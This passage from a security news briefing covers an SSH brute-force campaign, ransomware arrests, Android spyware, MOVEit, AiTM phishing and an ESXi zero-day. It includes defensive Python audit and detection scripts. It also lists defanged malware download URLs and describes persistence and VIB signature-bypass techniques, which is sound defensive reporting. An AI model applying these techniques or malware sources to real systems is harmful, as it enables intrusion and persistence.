Some of the commands here are obviously meant to enumerate hardware such as GPU's which could be used for cryptomining as well as to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.
The other malware is:
| Download URL | Malware |
|---|---|
| ddoser[.]org/key | Downloader (Bash script) |
| ddoser[.]org/logo | ShellBot DDoS bot |
| ddoser[.]org/siwen/bot | ShellBot DDoS bot |
| ddoser[.]org/siwen/a | Tsunami DDoS bot |
| ddoser[.]org/siwen/cls | MIG Logcleaner v2.0 |
| ddoser[.]org/siwen/clean | 0x333shadow Log Cleaner |
| ddoser[.]org/siwen/ping6 | Privilege escalation malware |
| ddoser[.]org/top | XMRig CoinMiner (compressed file) |
ASEC's report provides a complete rundown on this list of malware.
There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting
PasswordAuthentication no
in /etc/ssh/sshd_config. Set KbdInteractiveAuthentication (ChallengeResponseAuthentication on releases before OpenSSH 8.7) to no as well, since the PAM keyboard-interactive prompt is a password login by another name, and then confirm the result with sshd -T, which prints the effective configuration after any Include'd files and Match blocks have been applied. After that, one can sleep easily because this, and similar distributed, password brute-forcing campaigns will simply not work.
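Two checks follow from this story: that the daemon really cannot be reached with a password, and that nobody has already planted a key in authorized_keys, which is what the key script above does to survive a password change. The following is an added example, written for this briefing and not taken from the ASEC report or any OpenSSH tool: it audits the output of sshd -T (the effective configuration, rather than the file one edited) for the settings that let password guessing succeed at all, and compares the key blobs in an authorized_keys file against an allow-list of known keys, coping with option prefixes such as command="...". All inputs are constructed samples and the key blobs are not real keys.

```python
"""Added example, not from the ASEC report or any OpenSSH tool: audit the
effective sshd configuration (the output of `sshd -T`) for settings that let
a password brute-force succeed at all, and audit an authorized_keys file
against an allow-list of known key blobs, which is how the `key` script above
plants persistence. `sshd -T` is used rather than sshd_config itself because
Include'd files and Match blocks are where a re-enabled PasswordAuthentication
hides. All inputs below are constructed samples; the blobs are not real keys."""
import shlex

KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-",
                     "sk-ssh-ed25519", "sk-ecdsa-")
ROOT_LOGIN_WITHOUT_PASSWORD = {"no", "prohibit-password", "without-password",
                               "forced-commands-only"}


def parse_sshd_dump(text):
    """`sshd -T` prints one 'keyword value' line per effective option, keywords in lower case."""
    cfg = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            cfg[parts[0].lower()] = parts[1].strip()
    return cfg


def audit_sshd(cfg):
    """Return a list of weaknesses; [] means password guessing cannot succeed against this daemon."""
    findings = []
    if cfg.get("passwordauthentication", "yes") != "no":
        findings.append("PasswordAuthentication is not 'no'")
    # OpenSSH 8.7 renamed ChallengeResponseAuthentication to KbdInteractiveAuthentication;
    # under either name it is the PAM password prompt, and it must be off too.
    kbi = cfg.get("kbdinteractiveauthentication",
                  cfg.get("challengeresponseauthentication", "yes"))
    if kbi != "no":
        findings.append("keyboard-interactive (PAM password) authentication still enabled")
    if cfg.get("permitrootlogin", "yes") not in ROOT_LOGIN_WITHOUT_PASSWORD:
        findings.append("PermitRootLogin permits password login as root")
    if cfg.get("pubkeyauthentication", "yes") != "yes":
        findings.append("PubkeyAuthentication is disabled")
    return findings


def parse_authorized_keys(text):
    """Yield (options, key_type, blob, comment) per key line. Options such as
    command="..." may contain spaces, so the line is tokenised shell-style and
    the key starts at the first token that looks like a key type."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            toks = shlex.split(line)
        except ValueError:                 # unbalanced quote: fall back to plain splitting
            toks = line.split()
        idx = next((i for i, t in enumerate(toks) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(toks):
            continue
        yield ",".join(toks[:idx]), toks[idx], toks[idx + 1], " ".join(toks[idx + 2:])


def unknown_keys(text, allowed_blobs):
    """Return entries whose key blob is not on the allow-list. Comments and options are
    ignored deliberately: an intruder's key with a friendly comment is still an intruder's key."""
    return [entry for entry in parse_authorized_keys(text) if entry[2] not in allowed_blobs]


# Constructed samples (not real sshd output and not real keys).
WEAK_SSHD_DUMP = """\
port 22
passwordauthentication yes
challengeresponseauthentication yes
permitrootlogin yes
pubkeyauthentication yes
"""
HARDENED_SSHD_DUMP = """\
port 22
passwordauthentication no
kbdinteractiveauthentication no
permitrootlogin prohibit-password
pubkeyauthentication yes
"""
AUTHORIZED_KEYS = """\
# keys managed by the ops team
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIENPTlNUUlVDVEVEX0tOT1dOX0FETUlOX0tFWQ== admin@jumphost
command="/usr/bin/backup --pull",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCONSTRUCTED-BACKUP-KEY backup@nas
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCONSTRUCTED-UNKNOWN-KEY root@ddoser
"""
ALLOWED_BLOBS = {
    "AAAAC3NzaC1lZDI1NTE5AAAAIENPTlNUUlVDVEVEX0tOT1dOX0FETUlOX0tFWQ==",
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQCONSTRUCTED-BACKUP-KEY",
}

if __name__ == "__main__":
    for label, dump in (("weak", WEAK_SSHD_DUMP), ("hardened", HARDENED_SSHD_DUMP)):
        print(label, audit_sshd(parse_sshd_dump(dump)) or "clean")
    for options, ktype, blob, comment in unknown_keys(AUTHORIZED_KEYS, ALLOWED_BLOBS):
        print(f"unknown key: {ktype} ...{blob[-12:]} {comment!r} options={options!r}")
```

On a live host, feed parse_sshd_dump() the text of `sshd -T` run as root, and build the allow-list from the keys your configuration management actually distributes; anything else in root's authorized_keys is either undocumented or an intruder's.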
Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.
News Stories
US Government Pursues Ransomware Operators
The US Government is continuing to pursue ransomware operators around the world. In their latest success, the US Department of Justice has announced the FBI's arrest of a 20-year-old Russian national, Ruslan Magomedovich Astamirov in connection with LockBit ransomware operations.
'According to a criminal complaint obtained in the District of New Jersey, from at least as early as August 2020 to March 2023, Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware. Specifically, Astamirov directly executed at least five attacks against victim computer systems in the United States and abroad.
'"Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. “The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice."'
Astamirov is the second LockBit-affiliated Russian to be arrested.
Meanwhile, as the CL0P gang continues to exploit the MOVEit Transfer file transfer software and starts to extort the victims, the US State Department's Rewards for Justice program is offering up to US$10 million for information leading to the identification or location of CL0P and similar groups.
Uncredited, Russian National Arrested and Charged with Conspiring to Commit LockBit Ransomware Attacks Against U.S. and Foreign Businesses, US Department of Justice, 15 June 2023. Available online at https://www.justice.gov/opa/pr/russian-national-arrested-and-charged-conspiring-commit-lockbit-ransomware-attacks-against-us.
Rewards for Justice, "Advisory from @CISAgov, @FBI: ... ", tweet, 17 June 2023. Available online at https://twitter.com/RFJ_USA/status/1669740545403437056.
Android RAT Masquerades as Chat Apps
Researchers at ESET have been tracking an updated version of the GravityRAT spyware for Android, which is being distributed as trojaned versions of the messaging apps BingeChat and Chatico. These apps have never been distributed via the Google Play store, but instead are being promoted through malicious web sites - although how victims are lured to them is unknown.
GravityRAT has been around since at least 2015, and is a cross-platform remote access trojan, with versions for Windows, macOS and Android; its operator is unknown but possibly based in Pakistan, as it focuses on Indian targets. ESET tracks the threat actor as SpaceCobra.
This new variant actually does provide chat functionality, being based on the open-source OMEMO Instant Messenger app, but before the user even logs in to the app, it has already contacted its C2 server, exfiltrating the user's data and waiting for commands. GravityRAT can exfiltrate call logs, the user's contact list, SMS messages, various types of files and the device location; the new variant can also delete files, contacts and call logs. It is also capable of exfiltrating backup files created by WhatsApp Messenger, which is extremely popular in India.
The ESET report contains IOC's and a mapping to MITRE ATT&CK techniques.
Stefanko, Lukas, Android GravityRAT goes after WhatsApp backups, blog post, 15 June 2023. Available online at https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Ransomware Permanently Closes Hospital
A salutary tale about cyber resilience, business continuity and the risk posed by ransomware: CBS News reports that a hospital in Central Illinois is closing down, at least in part due to a ransomware attack.
St. Margaret's Health, which operates in the city of Spring Valley, Illinois, will shut down today, blaming a devastating ransomware attack in 2021 which prevented it from filing insurance claims. This seems to be the first time that a hospital has blamed cybercriminals for its closure, although other factors, such as staffing costs and supply chain issues, also played a part.
CBS Chicago Team, Central Illinois hospital closing after 2021 ransomware attack, news report, 13 June 2023. Available online at https://www.cbsnews.com/chicago/news/st-maragrets-health-central-illinois-hospital-closing/.
MOVEit Transfer: The Gift That Just Keeps Giving
File transfer software vendor Progress Software has had to disclose yet another critical vulnerability in their MOVEit Transfer product. At the time of writing, no fix is available, and the suggested mitigation is to block all HTTP and HTTPS traffic to MOVEit Transfer machines. The firm notes that once this is done:
- Users will not be able to log on to the MOVEit Transfer web UI
- MOVEit Automation tasks that use the native MOVEit Transfer host will not work
- REST, Java and .NET APIs will not work
- MOVEit Transfer add-in for Outlook will not work
But other than that, it will be business as usual, with the SFTP and FTP protocols still working as normal - which renders using MOVEit somewhat pointless, since its major convenience is a browser-based interface that is easy for users.
Meanwhile, CNN News reports that a number of US Government agencies have been hit by ransomware group Cl0p, including the Department of Energy, as well as one of its subcontractors.
Progress Software, MOVEit Transfer Critical Vulnerability – CVE Pending (June 15, 2023), web article, 15 June 2023. Available online at https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023.
Lyngaas, Sean, Exclusive: US government agencies hit in global cyberattack, news report, 15 June 2023. Available online at https://edition.cnn.com/2023/06/15/politics/us-government-hit-cybeattack/index.html.
CISA Releases Two Advisories
The US Cybersecurity & Infrastructure Security Agency has released two advisories which should prove useful to enterprises everywhere.
The first, issued in conjunction with the NSA, addresses the recent vulnerabilities in baseboard management controllers (BMC's) discovered by Eclypsium. BMC's are buried deep within system boards and get access to the system even before the UEFI BIOS starts execution, allowing a threat actor to install bootkits, or disable the TPM and UEFI secure boot process. In fact, the BMC remains active even when a server is powered down.
The CISA/NSA hardening guide lists a number of recommended actions, including updating BMC credentials, using VLAN segmentation to isolate BMC's from the other network infrastructure, performing routine update checks and other suggestions.
The other CISA advisory is one of a series on understanding ransomware threat actors, and deals specifically with the LockBit Ransomware-as-a-Service group. LockBit affiliates are probably the most active of all ransomware groups, and the advisory provides advice on the vulnerabilities they typically exploit, as well as the TTP's they use. It also provides a number of suggested mitigations.
Uncredited, CISA and NSA Release Joint Guidance on Hardening Baseboard Management Controllers (BMCs), cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-nsa-release-joint-guidance-hardening-baseboard-management-controllers-bmcs.
Uncredited, CISA and Partners Release Joint Advisory on Understanding Ransomware Threat Actors: LockBit, cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-partners-release-joint-advisory-understanding-ransomware-threat-actors-lockbit.
Microsoft Patches Windows Kernel Vuln, Doesn't Enable Patch
A curious situation has arisen with yesterday's updates for Windows Server 2022, Windows 10 and Windows 11: the Redmondites shipped a patch for an important kernel information disclosure vulnerability, but did not enable the fix. The vulnerability, which could allow an authenticated but unprivileged attacker to view the contents of the heap of a privileged process, was awarded a base CVSS 3.1 score of 4.7 - it would have been higher if the attack was not so complex, requiring coordination with another, privileged process.
At a guess the likely delay in enabling the fix is due to the time required to perform comprehensive regression testing; after all, everything makes use of the heap and the kernel, so there could be corner cases with applications doing strange things that a fix would break. However, users who have relatively simple installations, especially in high-threat environments, e.g. facing the Internet, may want to enable the fix, and Microsoft has released a knowledge base article providing instructions.
Enabling the patch simply involves adding a registry entry, with different values for the various affected platforms. You might want to test the effects in a lab environment before deploying this too widely, though.
Uncredited, KB5028407: How to manage the vulnerability associated with CVE-2023-32019, Windows Support knowledge base article, 13 June 2023. Available online at https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080.
Yet Another Sidechannel Attack - This Time Using Power LED's
In a paper to be presented at Black Hat 23, researchers from Cornell and Ben Gurion universities demonstrate a novel technique to recover cryptographic keys from a device by analyzing video footage of the device's power LED. This works because the cryptographic computations performed by the CPU change the device's power consumption, which in turn affects the brightness of the power LED.
The attack uses an ingenious technique to increase the camera's sampling rate from the normal rate of 60 frames per second, which would be too slow, to 60 thousand measurements per second by exploiting the camera's rolling shutter.
In their first demonstrations, the researchers were able to recover a 256-bit ECDSA key from a smart card by analyzing video footage of the power LED of a smart card reader via a hijacked Internet-connected security camera located 16 meters away from the smart card reader.
The device need not even have a power LED itself, but merely be connected to something that does; in their second attack the researchers were able to recover a 378-bit SIKE key from a Samsung Galaxy S8 by analyzing video footage of the power LED of Logitech Z120 USB speakers that were connected to the same USB hub used to charge the phone. In this case, the camera was an iPhone 13 Pro Max.
I shall be interested to see whether this technique will work against the LED's of a beefy tower computer when a security key is being used as part of multi-factor authentication. If it does, I shall be disabling the LED's and adding a roll of thick black electrical tape to my travel kit.
Nassi, Ben, et al., Video-Based Cryptanalysis: Extracting Cryptographic Keys from Video Footage of a Device's Power LED, conference presentation, August 2023. Available online at https://www.nassiben.com/video-based-crypta.
More Analysis of BEC Attacks
Over the last couple of days, we have covered business email compromise attacks, and today provides yet another example. This time, Israeli incident response firm Sygnia provides an analysis of a BEC campaign affecting dozens of victim organizations world-wide.
High-level description of the attack chain (image credit: Sygnia)
Their analysis, produced using an array of threat intelligence tools, shows the following steps:
- A phishing email was sent to one of Sygnia's client’s employees, originating from a legitimate mailbox of an external company, assumed to be previously compromised.
- The phishing email included a link leading to a file sharing request page, hosted on an assumed to be compromised domain, with a URL path associated with the email sender’s company.
- Upon clicking the link, the victim was referred to an ‘I'm not a robot’ check hosted by Cloudflare, which acts as an anti-tracing method.
- After passing the check, the victim was referred to a fraudulent Office365 authentication page, generated by a phishing kit.
- After the victim entered his credentials, the phishing kit initiated an ‘Adversary in The Middle’ (AiTM) attack, forwarding the client authentication and MFA challenge to a legitimate Microsoft authentication service while stealing the acquired session token as well as the credentials to enable access to the account.
- The threat actor then logged into the victim’s account using the stolen token and added a new MFA device to gain persistent access.
- Once persistent access was achieved, the threat actor created a new file sharing request site related to the new victim’s company and compromised account.
- In addition to exfiltration of sensitive data from the compromised account, the threat actor used this access to send new phishing emails containing the new malicious link to dozens of the client’s employees as well as to additional targeted organizations.
These tactics are similar to those analyzed by Microsoft Threat Intelligence, which we reported on yesterday. The value of Sygnia's report is its detailed demonstration of analytic pivoting and the variety of tools used. The implications for likely victims are clear: use of multi-factor authentication is not much of a defense when poorly-trained and unaware users can fall victim to Man-in-the-Middle attacks.
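The persistence step in the chain above (a stolen session token replayed from the attacker's address, followed by registration of a new MFA device) is detectable from sign-in and audit records. The following is an added example, not Sygnia's or Microsoft's code; its event schema, baseline and log records are constructed for illustration and do not mirror any real tenant's log format.

```python
"""Detect the persistence step of the AiTM chain described above: a sign-in
from an address never before seen for that user, followed within a short
window by the registration of a new MFA method.

Added example, not Sygnia's or Microsoft's code. The event schema and the
records below are constructed and simplified for illustration.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)

# Baseline of source addresses each user normally signs in from (constructed).
BASELINE = {"alice": {"203.0.113.10"}, "bob": {"203.0.113.11"}}

# Constructed events: (timestamp, user, event type, source IP). The 'signin'
# from 198.51.100.77 stands for the stolen session token being replayed.
EVENTS = [
    ("2023-06-12T08:01:00", "alice", "signin", "203.0.113.10"),
    ("2023-06-12T09:40:00", "alice", "signin", "198.51.100.77"),
    ("2023-06-12T09:52:00", "alice", "mfa_method_added", "198.51.100.77"),
    ("2023-06-12T10:00:00", "bob", "signin", "203.0.113.11"),
    ("2023-06-12T10:05:00", "bob", "mfa_method_added", "203.0.113.11"),
    ("2023-06-12T15:30:00", "alice", "mfa_method_added", "203.0.113.10"),
]


def detect_token_theft_persistence(events, baseline, window=WINDOW):
    """Return [(user, suspicious_ip, mfa_event_time)] for each MFA registration
    that follows a sign-in from a new address by the same user within `window`."""
    known = {u: set(ips) for u, ips in baseline.items()}
    last_new_signin = {}  # user -> (time, ip) of latest sign-in from a new IP
    alerts = []
    for ts, user, kind, ip in sorted(events):
        t = datetime.fromisoformat(ts)
        seen = known.setdefault(user, set())
        if kind == "signin":
            if ip not in seen:
                last_new_signin[user] = (t, ip)
            seen.add(ip)  # a legitimate new device becomes baseline after this
        elif kind == "mfa_method_added":
            hit = last_new_signin.get(user)
            if hit and t - hit[0] <= window:
                alerts.append((user, hit[1], ts))
    return alerts


if __name__ == "__main__":
    for alert in detect_token_theft_persistence(EVENTS, BASELINE):
        print("ALERT: new MFA method for %s after sign-in from new address %s at %s" % alert)
```

Bob's registration from a baseline address is not flagged, and Alice's later registration from her usual address falls outside the window; only the registration that follows the replayed session is reported.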
Sadon, Amir, Dor Fenigshtein, Shani Adir Nissim, Amnon Kushni and Ori Porag, Case Study: cracking a global Adversary-In-The-Middle campaign using a threat intelligence toolkit, blog post, 13 June 2023. Available online at https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit.
Chinese APT Exploits ESXi 0day
Last year, Mandiant reported on a new technique which was being used by UNC3886, a possibly Chinese cyber-espionage threat actor (the UNC designation means that the actor was as yet uncategorized). The technique involved the creation of malicious vSphere Installation Bundles (VIB's) and duping the ESXi server into installing them by faking the acceptance level of the bundle.
By default, a ESXi host will only install bundles with an acceptance level of PartnerSupported or above; in this case, the attacker had modified the bundle's XML descriptor, changing the acceptance-level field from Community-Supported to PartnerSupported, and while this meant that the digital signature of the bundle would not validate, the attacker simply removed the signature and used the --force or --no-sig-check options on the installation command to get the bundle installed anyway.
This technique was used to install backdoors on the ESXi servers, executing commands on guest machines through the vmtoolsd.exe process, from which information, including credentials, could then be exfiltrated.
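The forgery described above leaves a checkable inconsistency in the bundle itself: a descriptor claiming a trusted acceptance level with no signature to back it. The following is an added example, not Mandiant's or VMware's code; it assumes a VIB is a Unix ar archive whose members include descriptor.xml (with an <acceptance-level> element) and sig.pkcs7 (the bundle signature), and the sample bundles it audits are constructed inline.

```python
"""Audit a vSphere Installation Bundle (VIB) for the tampering described above.

Added example, not Mandiant's or VMware's code. Assumed (not stated on the
page): a VIB is an 'ar' archive containing descriptor.xml, whose
<acceptance-level> element holds certified/accepted/partner/community, and a
sig.pkcs7 signature member. A bundle claiming a trusted level with an empty
signature could only have been installed with --force / --no-sig-check.
"""
import xml.etree.ElementTree as ET

AR_MAGIC = b"!<arch>\n"
TRUSTED_LEVELS = {"certified", "accepted", "partner"}  # these must be signed


def ar_members(blob: bytes) -> dict:
    """Parse a classic 'ar' archive into {member_name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]            # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = hdr[0:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)       # member data is 2-byte aligned
    return members


def ar_pack(members: dict) -> bytes:
    """Build a minimal ar archive; used here only to construct sample VIBs."""
    out = bytearray(AR_MAGIC)
    for name, data in members.items():
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'644':<8}{len(data):<10}`\n"
        out += hdr.encode() + data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def audit_vib(blob: bytes) -> list:
    """Return findings for the bundle; an empty list means nothing suspicious."""
    members = ar_members(blob)
    desc = members.get("descriptor.xml")
    if desc is None:
        return ["descriptor.xml missing"]
    level = (ET.fromstring(desc).findtext("acceptance-level") or "").strip()
    sig = members.get("sig.pkcs7", b"")
    findings = []
    if level in TRUSTED_LEVELS and len(sig) == 0:
        findings.append(f"acceptance-level '{level}' claimed but signature absent "
                        "(installable only with --force / --no-sig-check)")
    elif level not in TRUSTED_LEVELS | {"community"}:
        findings.append(f"unknown acceptance-level '{level}'")
    return findings


# Constructed sample bundles (not real VMware or attacker artefacts).
LEGIT_COMMUNITY_VIB = ar_pack({
    "descriptor.xml": b"<vib><acceptance-level>community</acceptance-level></vib>",
    "sig.pkcs7": b"",          # community bundles are legitimately unsigned
    "payload1": b"fake-payload",
})
FORGED_PARTNER_VIB = ar_pack({
    "descriptor.xml": b"<vib><acceptance-level>partner</acceptance-level></vib>",
    "sig.pkcs7": b"",          # signature stripped after raising the level
    "payload1": b"fake-payload",
})

if __name__ == "__main__":
    for label, vib in (("community", LEGIT_COMMUNITY_VIB), ("forged", FORGED_PARTNER_VIB)):
        print(label, audit_vib(vib) or "OK")
```

The check cannot verify a present signature offline; on a live host that is what the signature verification built into esxcli is for, and this audit only catches the stripped-signature case.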
Now UNC3886 is back, with additional techniques. Their primary goal seems to be to evade detection; this may be why they target VMware ESXi hosts in the first place, since they commonly do not support EDR products. The evasion techniques employed by this actor include:
- Harvesting credentials for service accounts from a vCenter Server for all connected ESXi hosts from the embedded vPostgreSQL server built into vCenter Server Appliance
- Exploiting a zero-day vulnerability (CVE-2023-20867) that enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs
- Deploying backdoors on ESXi hosts using an alternative socket address family, VMCI, for lateral movement and continued persistence. This address family enabled direct reconnection from any guest VM to the compromised ESXi host’s backdoor regardless of network segmentation or firewall rules in place.
- Continuing to tamper with and disable logging services on impacted systems, presenting additional challenges to investigating UNC3886 in a compromised environment.
An interesting point about this report is the IOC's reported: following previous Mandiant reports, UNC3886 has been very quick to change the atomic IOC's of its tools, such as file names and digests. Accordingly, this time Mandiant has focused on the tactics and methodologies used by the group - in effect, behavioural IOC's.
Marvi, Alexander, Jeremy Koppen, Tufail Ahmed, Jonathan Lepore, Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors, blog post, 28 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence.
Marvi, Alexander, Brad Slaybaugh, Ron Craft and Rufus Brown, VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors, blog post, 13 June 2023. Available online at https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass.
DoJ Scores Two Wins
The US Attorney's Office, Southern District of New York, has scored a couple of small victories in the last few days.
First, along with the Northern District of California and the DoJ's Criminal Division, it laid charges against two Russian nationals for their part in the 2011 theft of cryptocurrency from wallets on the Mt. Gox exchange, which ultimately led to its collapse in 2014. Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, are accused of conspiring to launder approximately 647,000 bitcoins from the 2011 hack.
Bilyuchenko is separately charged in the Northern District of California with conspiring with Alexander Vinnik to operate the illicit cryptocurrency exchange BTC-e from 2011 to 2017, laundering funds for cybercriminals worldwide.
Of course, indictment is one thing; both Bilyuchenko and Verner remain at large, probably in Russia, making their appearance in court unlikely.
In a separate case, Mihai Ionut Paunescu, a.k.a. "Virus", was sentenced to three years in prison for conspiracy to commit computer intrusion in connection with running a "bulletproof hosting" service that enabled cybercriminals to distribute the Gozi Virus, the Zeus Trojan, the SpyEye Trojan, and the BlackEnergy banking trojans. Paunescu had also been involved in DDoS attacks and spamming, and had pleaded guilty back in February.
Biase, Nicholas, Russian Nationals Charged With Hacking One Cryptocurrency Exchange And Illicitly Operating Another, press release, 9 June 2023. Available online at https://www.justice.gov/usao-sdny/pr/russian-nationals-charged-hacking-one-cryptocurrency-exchange-and-illicitly-operating.
Biase, Nicholas, Romanian National Who Operated “Bulletproof Hosting” Service That Facilitated The Distribution Of Destructive Malware Sentenced To Three Years In Prison, press release, 12 June 2023. Available online at https://www.justice.gov/usao-sdny/pr/romanian-national-who-operated-bulletproof-hosting-service-facilitated-distribution.